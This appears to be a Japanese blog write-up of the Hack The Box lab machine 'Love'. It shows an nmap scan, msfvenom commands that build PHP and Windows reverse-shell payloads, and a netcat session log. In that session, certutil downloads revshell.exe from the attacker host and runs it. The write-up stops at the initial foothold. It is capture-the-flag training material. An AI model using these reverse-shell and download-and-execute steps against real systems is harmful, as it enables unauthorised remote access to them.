🐥

LOVE_HTB

2023/11/29に公開

Machine

Scan

  • コマンド
    sudo nmap -Pn -sV -T4 10.10.10.239
  • 結果
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -sV -T4 10.10.10.239        
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-28 07:11 EST
Nmap scan report for 10.10.10.239
Host is up (0.33s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=11/28%Time=6565D8DC%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLine
SF:s,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,4A,"F\0\0\x01\
SF:xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\xffj
SF:\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessionReq,4A,"F\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conn
SF:ect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x
SF:20this\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(SIPOptions,4A,"F\0\0\x01\xffj\x04Host\x20'1
SF:0\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x
SF:20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.34 second

Initial Access

  • hosot準備
    sudo echo "10.10.10.239 www.love.htb staging.love.htb" > /etc/hosts

  • Webアクセス(www.love.htb)

  • Webアクセス(staging.love.htb)

  • Webアクセス(staging.love.htb/beta.php)

  • Webアクセス(www.love.htb/admin)

Make Shell

  • Ready

  • make reverce.php
    msfvenom -p php/reverse_php LHOST=<ip address> LPORT=<your port> -f raw > phpreverseshell.php

    • 結果
      ┌──(kali㉿kali)-[~/love]
      └─$ msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=135 -f raw >    phpreverseshell.php
      [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
      [-] No arch selected, selecting arch: php from the payload
      No encoder specified, outputting raw payload
      Payload size: 3027 bytes
      
  • upload reverce.php

以下修正

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.54 LPORT=445 -f exe > revshell.exe

┌──(kali㉿kali)-[~/love]
└─$ nc -lnvp 4444    
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.239] 54044
whoami
love\phoebe
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

11/28/2023  06:53 AM    <DIR>          .
11/28/2023  06:53 AM    <DIR>          ..
05/18/2018  07:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  02:53 PM                 0 index.html.txt
01/26/2021  11:08 PM               844 index.jpeg
11/28/2023  06:53 AM             3,038 phpreverseshell.php
08/24/2017  03:00 AM            26,644 profile.jpg
11/28/2023  06:49 AM             7,168 revshell.exe
               6 File(s)         41,934 bytes
               2 Dir(s)   3,905,249,280 bytes free
certutil.exe -urlcache -split -f http://10.10.16.10/revshell.exe revshell.exe
****  Online  ****


CertUtil: -URLCache command FAILED: 0x80072efd (WinHttp: 12029 ERROR_WINHTTP_CANNOT_CONNECT)
CertUtil: A connection with the server could not be established
certutil.exe -urlcache -split -f http://10.10.16.10:8080/revshell.exe revshell.exe
****  Online  ****
  0000  ...
  1c00
CertUtil: -URLCache command completed successfully.
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

11/28/2023  06:53 AM    <DIR>          .
11/28/2023  06:53 AM    <DIR>          ..
05/18/2018  07:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  02:53 PM                 0 index.html.txt
01/26/2021  11:08 PM               844 index.jpeg
11/28/2023  06:53 AM             3,038 phpreverseshell.php
08/24/2017  03:00 AM            26,644 profile.jpg
11/28/2023  06:55 AM             7,168 revshell.exe
               6 File(s)         41,934 bytes
               2 Dir(s)   3,905,241,088 bytes free
.\revshell.exe

Discussion